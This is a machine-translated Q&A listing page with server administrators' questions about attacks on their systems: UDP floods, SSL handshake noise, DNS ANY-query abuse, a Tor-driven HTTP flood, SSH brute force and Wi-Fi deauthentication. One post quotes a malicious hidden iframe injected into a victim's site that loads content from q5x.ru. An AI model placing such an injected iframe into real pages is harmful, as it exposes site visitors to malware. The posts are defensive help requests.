关于【attacks】的问题- 第1页

QuickBooksRus

Asked: 2021-08-16 14:22:48 +0800 CST

阻止 UDP 攻击

0

我现在收到来自 OVH 的支持电子邮件，说明我的服务器上有异常活动。

这是一个简单的服务器，我有 RDP 连接供学生访问 QuickBooks、Excel 和 Word，服务器上没有其他内容，我设置了组策略，他们几乎无法访问任何内容，包括互联网、文件、 ETC ...

以下是我收到的 OVH 消息...我已经阻止了 Windows 防火墙和计算机配置中的所有 UDP 出站...我不是这方面的专家...这会阻止异常行为吗？

Attack detail : 4Kpps/53Mbps
dateTime srcIp:srcPort dstIp:dstPort protocol flags packets bytes reason
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:15800 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:703 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 201.71.201.195:41519 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:19103 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 72.204.176.88:8080 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:11396 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 24.217.44.95:80 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 72.204.176.88:8080 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:32431 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:48208 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:7814 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 201.71.202.157:61154 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 87.123.195.143:443 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:22084 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:34101 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:32807 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:60109 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:38144 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:27707 UDP --- 16384 24870912 ATTACK:UDP
2021.08.15 21:56:26 CEST 135.148.34.13:389 67.220.81.64:28195 UDP --- 16384 24870912 ATTACK:UDP

fernandezr

Asked: 2021-03-16 02:17:40 +0800 CST

Nginx 日志显示 ssl 握手错误

0

我已经看到我的 nginx 错误日志充满了这样的消息：

(*date*) [info] 69487#0: *1064573 peer closed connection in SSL handshake while SSL handshaking, client: 95.64.*.*, server: 0.0.0.0:443
(*date*) [info] 69487#0: *1064574 peer closed connection in SSL handshake (104: Connection reset by peer) while SSL handshaking, client: 95.162.*.*, server: 0.0.0.0:443
(*date*) [info] 69487#0: *1064572 peer closed connection in SSL handshake while SSL handshaking, client: 5.112.*.*, server: 0.0.0.0:443
(*date*) [info] 69487#0: *1064576 peer closed connection in SSL handshake (104: Connection reset by peer) while SSL handshaking, client: 188.211.*.*, server: 0.0.0.0:443
(*date*) [info] 69487#0: *1064578 peer closed connection in SSL handshake while SSL handshaking, client: 185.120.*.*, server: 0.0.0.0:443
(*date*) [info] 69487#0: *1064577 peer closed connection in SSL handshake while SSL handshaking, client: 5.126.*.*, server: 0.0.0.0:443

注意：我有匿名日期和 ip

服务器日志包含很多类似的日志行。我创建了一个 fail2ban 规则来过滤它们，一天后它已将超过 6000 个 ips 列入黑名单。快速浏览其中一些列入黑名单的内容表明，几乎所有内容都来自伊朗，但并未出现在https://www.abuseipdb.com中。

这是攻击吗？或者可能是我错误配置了 nginx 服务器？如果是攻击，它是什么类型的攻击？如果 IP 地址是恶意的，我需要知道这一点以报告 IP 地址。

William

Asked: 2021-01-09 01:15:21 +0800 CST

我可以为了钱举报恶意 IP 地址吗？

-5

我的服务器每天都会受到来自数千个 IP 地址的攻击。我有个主意。我可以举报那些恶意IP地址，或者利用资源赚钱吗？如何？

您可能认为这些攻击在 Internet 上很常见。但是对我的服务器的攻击有点特殊。它们每天都来自成千上万个不同的 ip。他们试图登录我的盒子（但失败了）。最不常见的是每个 ip 只进行几次尝试，然后其他 ip 继续。如果这种情况继续下去，我想我可以捕获世界上相当多的受感染计算机。

不要将您的想法限制在将这些 ip 报告到某个地方。这绝对是一个以我还不知道的方式赚钱的好资源。

反对票使我无法在这里提出新问题。各位访客能否为这个问题投票以帮助我摆脱限制？我诅咒那些失望的选民。

谢谢！

watchsat

Asked: 2020-08-02 20:21:14 +0800 CST

来自外部 IP 端口 80 的 DNS 攻击，怎么会发生这种情况？

9

刚刚从我的 DNS 服务器的日志中注意到，显示有人通过端口 80 攻击我的服务器：

/var/log/bind.log:31-Jul-2020 03:25:50.536 query-errors: client @0x7f63345948a0 185.107.80.2#36045 (PEACECORPS.GOV): view internet: query failed (REFUSED) for PEACECORPS.GOV/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:31-Jul-2020 05:31:41.446 query-errors: client @0x7f63347273e0 144.217.34.151#53799 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:31-Jul-2020 11:28:20.928 query-errors: client @0x7f63345948a0 2.57.122.193#45066 (.): view internet: query failed (REFUSED) for ./IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:31-Jul-2020 14:21:50.516 query-errors: client @0x7f63345638a0 193.9.17.2#59905 (wzb.eu): view internet: query failed (REFUSED) for wzb.eu/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 07:51:58.756 query-errors: client @0x7f6334718db0 89.248.168.17#37241 (cpsc.gov): view internet: query failed (REFUSED) for cpsc.gov/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 18:09:37.112 query-errors: client @0x7f633801db20 83.97.20.164#21544 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:12:03.982 query-errors: client @0x7f6334689490 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:12:04.263 query-errors: client @0x7f63381dba30 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:12:04.333 query-errors: client @0x7f63381dba30 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:12:04.708 query-errors: client @0x7f63381dba30 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:12:22.091 query-errors: client @0x7f63381611b0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:12:22.534 query-errors: client @0x7f63381611b0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:12:23.634 query-errors: client @0x7f63381611b0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:12:26.022 query-errors: client @0x7f63381611b0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:13:01.519 query-errors: client @0x7f63347d8eb0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:13:02.432 query-errors: client @0x7f63346f2650 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:13:19.174 query-errors: client @0x7f63345948a0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:13:20.556 query-errors: client @0x7f633801db20 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:13:35.657 query-errors: client @0x7f63381611b0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:13:39.615 query-errors: client @0x7f633c0da830 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:13:51.414 query-errors: client @0x7f63345948a0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:13:57.623 query-errors: client @0x7f63381dba30 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:14:07.363 query-errors: client @0x7f63346f2650 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:14:15.991 query-errors: client @0x7f6334771730 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:14:25.212 query-errors: client @0x7f63347ca880 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:14:32.046 query-errors: client @0x7f63381dba30 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:14:43.583 query-errors: client @0x7f6334775120 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:14:50.684 query-errors: client @0x7f6338289e50 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:15:01.011 query-errors: client @0x7f633c0da830 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:15:08.899 query-errors: client @0x7f63381dba30 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:15:17.051 query-errors: client @0x7f63347e74e0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:15:26.382 query-errors: client @0x7f63381611b0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:15:33.001 query-errors: client @0x7f63347ca880 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:15:44.613 query-errors: client @0x7f63346f2650 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:15:49.267 query-errors: client @0x7f63345948a0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:16:02.472 query-errors: client @0x7f6334775120 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:16:04.881 query-errors: client @0x7f6338289e50 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:16:20.139 query-errors: client @0x7f63381dba30 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:16:21.184 query-errors: client @0x7f6334718db0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:16:37.295 query-errors: client @0x7f63346f2650 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:16:37.725 query-errors: client @0x7f63346f2650 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:16:53.255 query-errors: client @0x7f6334775120 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:16:55.799 query-errors: client @0x7f6334775120 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:17:09.169 query-errors: client @0x7f63346f2650 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:17:14.215 query-errors: client @0x7f6334771730 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:17:25.206 query-errors: client @0x7f63347d8eb0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:17:31.728 query-errors: client @0x7f633827b820 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:17:40.997 query-errors: client @0x7f63381611b0 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:17:50.548 query-errors: client @0x7f633827b820 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145
/var/log/bind.log:01-Aug-2020 19:17:57.181 query-errors: client @0x7f63381dba30 37.49.224.64#80 (sl): view internet: query failed (REFUSED) for sl/IN/ANY at /bin/named/query.c:7145

想知道他们怎么能做到？

我的 DNS 服务器只允许端口 53 和 22 进入，并且还有进程通过 firewall-cmd 命令监控和阻止这些类型的 IP，如下所示：

firewall-cmd --zone=public --add-rich-rule='rule family="ipv4" source address="37.49.224.64" drop' --permanent

这通常适用于大多数攻击，但不适用于此 IP，尝试将区域从公共更改为阻止，将操作从丢弃更改为拒绝，没有任何效果。

最后我必须从外部防火墙阻止这个IP，然后最后把它拿出来。

想知道有人见过这种攻击吗？他们如何绕过本地防火墙？

任何建议将不胜感激！

me_yy

Asked: 2020-03-31 09:34:11 +0800 CST

这是真正的谷歌机器人还是攻击？我该如何处理？

3

所以基本上我的网站无法访问，我去日志文件夹看看出了什么问题，并注意到来自各种 IP 的许多奇怪的请求：

155.4.117.13 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
155.4.117.13 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
155.4.117.13 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
155.4.117.13 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
155.4.117.13 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
155.4.117.13 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
155.4.117.13 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
162.247.74.206 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
162.247.74.206 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
162.247.74.206 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
162.247.74.206 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
155.4.117.13 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
162.247.74.206 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
209.141.45.189 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
155.4.117.13 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
155.4.117.13 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
162.247.74.206 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
162.247.74.206 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
209.141.45.189 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
155.4.117.13 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
155.4.117.13 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:45 +0300] "GET / HTTP/1.0" 200 6189 "-" "Google Bot"
185.220.100.252 - - [30/Mar/2020:20:23:56 +0300] "GET / HTTP/1.0" 200 6344 "-" "Google Bot"
209.141.45.189 - - [30/Mar/2020:20:23:56 +0300] "GET / HTTP/1.0" 200 6344 "-" "Google Bot"
162.247.74.206 - - [30/Mar/2020:20:23:56 +0300] "GET / HTTP/1.0" 200 6344 "-" "Google Bot"
155.4.117.13 - - [30/Mar/2020:20:23:56 +0300] "GET / HTTP/1.0" 200 6344 "-" "Google Bot"

我想知道这是不是某种攻击。

做了一些whois查询，例如这个ip 185.220.100.252来自德国，“tor-exit-1.zbau.f3netze.de”

如何保护服务器免受此类攻击？

他们确实喜欢每分钟数千个请求，我无法访问我自己的网站。

Error.log 说： AH00161: server reached MaxRequestWorkers setting, consider raising the MaxRequestWorkers setting

（我不是网站管理员，我为自己的需要托管了一个小网站，但不知道如何应对。）

Ahmet Berk Başaran

Asked: 2017-02-24 16:36:01 +0800 CST

TMG 只有 windows 2008 r2 安装。不工作 windows server 2012 r2

2

TMG Forefront 仅适用于 windows server 2008 或 2008R2 - 不适用于 windows server 2012。

如何缓解 windows server 2012R2 - Flood 攻击、http 攻击？

请帮助如何构建windows server 2012R2

Maximum TCP connect requests per minute per IP address   600 (custom: 6,000)
Maximum concurrent TCP connections per IP address        160 (custom: 400)  
Maximum half-open TCP connections (non-configurable)     80  
Maximum HTTP requests per minute per IP address          600 (custom: 6,000)  
Maximum new non-TCP sessions per minute per rule         1,000  
Maximum concurrent UDP sessions per IP address           160 (custom: 400)  
Specify how many denied packets trigger an alert         600

感谢您的帮助（全部）

Lee Ikard

Asked: 2016-10-30 18:12:19 +0800 CST

ssh serer 上的奇怪连接

0

所以，有一天，我决定检查 ssh 服务器日志。这样做了，发现了一些奇怪的东西。
大约有 3 个不同的 ips 试图暴力猜测 root 密码？我该怎么办，如果有的话？
PS：IP是：187.141.70.67，来自墨西哥？其他 2 个 ip 相似，来自中国，所以我认为它们是机器人。没有把握。

对不起，如果这是一个愚蠢的问题。我确实关闭了 ssh 服务器。

TheFuzzyFish

Asked: 2016-07-20 14:22:43 +0800 CST

解除身份验证数据包的合法用途是什么？

2

大多数出于教育目的以恶意方式篡改外部无线网络的人（希望是您自己的个人测试网络）可能听说过身份验证攻击。

这些攻击只是单个主机发送多个 deauth 数据包，要么通过断开设备与无线网络的连接来烦扰网络管理员，要么尝试获取 WPA/WPA2 网络的 4 次握手以尝试破解密码.

因此，对于想要邻居的无限数据计划的普通脚本小子来说，这显然是有潜力的，但是拥有解除身份验证数据包的真正意义是什么？我见过的 90% 的设备通过简单地重新验证网络来响应（我的智能电视除外），因此显然数据包绝不会强制设备重新连接，它只是告诉它并希望它遵守。但我只见过在 aireplay-ng 之类的东西中取消对客户端进行身份验证的选项。所以我无法登录我的路由器并告诉它向特定客户端发送数据包，因为它没有选项。既然是这种情况，我看到的数据包的唯一潜力就是攻击网络。

如果它们只是一种威胁，为什么我们还要制造能够倾听它们的设备？

Andreas Grech

Asked: 2009-07-31 01:08:09 +0800 CST

网站被隐藏的 iframe (q5x.ru) 攻击

2

我的一个网站最近感染了某种涉及注入隐藏 iframe 的攻击，它的来源来自一个网站 q5x.ru（请勿链接）。

谷歌搜索并没有帮助我弄清楚这次攻击是如何发生的，所以我想知道你们中是否有人遇到过同样的问题？

iframe 代码是这样的：

<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>

根据要求，我正在运行一个带有数据库的 ASP.Net 网站，就表单而言，显然是用于回发的 ASP.Net 表单。

阻止 UDP 攻击

Nginx 日志显示 ssl 握手错误

我可以为了钱举报恶意 IP 地址吗？

来自外部 IP 端口 80 的 DNS 攻击，怎么会发生这种情况？

这是真正的谷歌机器人还是攻击？我该如何处理？

TMG 只有 windows 2008 r2 安装。不工作 windows server 2012 r2

ssh serer 上的奇怪连接

解除身份验证数据包的合法用途是什么？

网站被隐藏的 iframe (q5x.ru) 攻击

新安装后 postgres 的默认超级用户用户名/密码是什么？

SFTP 使用什么端口？

命令行列出 Windows Active Directory 组中的用户？

什么是 Pem 文件，它与其他 OpenSSL 生成的密钥文件格式有何不同？

如何确定bash变量是否为空？

问题[attacks](server)